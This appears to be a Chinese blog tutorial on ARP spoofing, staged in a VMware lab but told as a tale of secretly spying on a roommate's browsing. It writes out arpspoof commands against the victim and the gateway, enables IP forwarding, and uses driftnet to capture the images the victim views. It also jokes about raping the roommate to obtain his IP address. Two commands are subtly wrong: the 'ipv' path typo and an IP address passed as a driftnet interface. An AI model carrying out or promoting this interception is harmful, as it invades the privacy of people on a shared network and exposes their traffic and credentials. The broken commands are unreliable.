康康,室友都在干什么羞羞的事 —— ARP欺骗

我不会RAP,但我会ARP

免责声明内容来源网络,版权归原创者所有,禁止使用本项目的任何形式进行发起网络攻击,阻止一切网络犯罪行为,一切信息禁止用于任何非法用途。除非无法确认,都会标明作者及出处,如有侵权烦请告知,我们会立即删除并致歉。谢谢!

一、ARP欺骗的用处

ARP欺骗,作为中间人攻击手段中的一种,一是可以实现对局域网中用户的断网攻击(PS:天要使其灭亡,必先使其断网),二是可以获取到受害用户的数据流量包括浏览的网站,图片,甚至账号密码(PS:想想还是有点恐怖的!),接下来,先让我给你讲讲什么是ARP吧!

二、什么是ARP

ARP,即Address Resolution Protocol,地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议。简单来说,就是将IP地址转换为物理地址(PS:在一个局域网中主机之间的通信是通过物理地址来完成的,计算机通信就像人类写信交流一样,必须要有个正确的收信地址,对方才有可能接收到,而在这个收信地址就是MAC地址)。附:计算机中会维护一个ARP缓存表,里面就是各个IP地址与物理地址之间的映射关系,可通过arp -a指令查看。

三、演示操作

[环境] Vmware虚拟机 (网络模式选择NAT模式)

攻击机:kali_Linux

受害机:WindowsServer12R2

[场景] 最近WX总一个人关起men在自己房间的桌前倒弄自己的电脑,神神秘秘的。

[人物] SR ,调皮鬼 ;WX ,老实孩子。


[SR] WX 这小子最近在干嘛?神神秘秘?难道是在网上进行多人运动 ......

让我来康康他到底在干嘛.

先来弄清楚宿舍的网络部署吧

由上图可以看出,我的目标就是:告诉网关我是WX,告诉WX我是网关.

问题的关键就是:要得到网关的ip地址及WX的IP地址

网关地址可以说是没有压力就可以获得(cmd下ipconfig  /all查看即可)

192.168.242.2

但WX的这个ip还是用社工的方式拿吧!(可以把他强暴一顿逼他说出IP,或者趁其不备偷偷查看一番,,,)

。。。。。。

然后就知道了舍友WX的 IP : 192.168.242.153

接着看一下我的网络的相关信息

arp -a        //查看一下,此时arp缓存表

ifconfig

信息整理:

攻击机

192.168.242.129    MAC:00-0C-29-BC-E5-D8

受害机

192.168.242.153    MAC:00-0C-29-94-36-A4

网关

192.168.242.2       MAC:00-50-56-F3-D1-ED

嘿嘿(●ˇ∀ˇ●) ,来咯,它来咯,,

使用工具 arpspoof

arpspoof -h        //查看此命令的相关参数

首先,对 WX 说我是 网关

arpspoof -t 192.168.242.153 -r 192.168.242.2

此时的WX,开始口吐芬芳了,,,( 没网了( ╯□╰ ) )

那看看 WX的 arp缓存表是否发生改变

arp -a

路由器的MAC地址 变成了我的  o(* ̄▽ ̄*)ブ

来吧,让咱们继续,,,

然后,对着 路由器 说我是 WX

arpspoof -t 192.168.242.2 -r 192.168.242.153

但是此时WX仍然上不了网,

这是因为, linux因为系统安全考虑,是不支持IP转发的。

其配置文件写在/proc/sys/net/ipv4的ip_forward中。默认为0,接下来修改为1。

(也可以通过命令行echo 1 > /proc/sys/net/ipv4/ip_forward实现。)

那赶紧给恢复网络,康康他在看啥好的.

echo 1 > /proc/sys/net/ipv/ip_forward

现在看看WX的电脑能不能上网呢

可以的 o(* ̄▽ ̄*)ブ

此时,WX与网关通信的数据包都会流经我

那么我可以利用kali中的 driftnet工具(可以捕获物理机正在浏览的图片)

看看这小子到底在干些什么。

drifnet  -i  192.168.242.153

咦咦咦,这样子

好像无意间伸进狗头,吃了一波狗粮  (●'◡'●)

(0)

相关推荐